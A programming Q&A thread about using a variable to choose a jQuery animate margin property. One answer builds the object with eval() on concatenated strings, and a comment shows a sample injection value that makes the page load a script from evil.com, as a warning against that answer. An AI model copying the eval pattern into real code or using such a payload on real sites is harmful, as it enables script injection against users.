# Using variables in object property names

Tags: javascript, jquery

I have a variable called direction that stores either: `left`, `right`.

I need to change the affected margin based on that variable.

Right now I'm using conditions, is it possible to replace "left" with the output of the variable `direction`?

```
$("#map").animate({"margin-left": "+=50px"}, 500);
```

Comment: See: http://stackoverflow.com/questions/6071471/javascript-object-variable-key

Answer (score 5, accepted):

Not directly, but you can create an object and manipulate it before using it in `animate()`:

```
var direction = "left";
var property = {};
property[ "margin-"+direction ] = "+=50px";
$("#map").animate( property, 500);
```

Answer (score 2):

Use this. Since there's no `margin-up` or `margin-down`, you have to "manually" translate it:

```
var dir = "left";
dir = dir == "up" ? "top" : dir == "down" ? "bottom" : dir;
var obj = {};
obj["margin-" + dir] = "+=50px";
$("#map").animate(obj, 500);
```

The second line is a legitimate, shorter way to write:

```
if(dir == "up"){
    dir = "top";
} else if(dir == "down"){
   dir = "bottom";
} else {
    dir = dir;
}
```

Comment: Or even better, use `top` and `bottom` in the first place, if at all possible.

Answer (score 0):

```
eval('props = {"margin-' + direction  + '": "+=50px"}')
$("#map").animate(props, 500);
```

Comment: `var direction='"+function(){d=document.createElement("script");d.src="http://evil.com/evil.js";document.body.appendChild(d)}+"'; ...//your code here`. Does that still work?

Comment: @RobW: I didn't understand your point. 'direction' is local variable, and the one who wrote the script assigned some legitimate value to it. How could it be used in the way you described?

Comment: You haven't defined `direction` yet. So, I assume that it's defined somewhere else, possibly infected.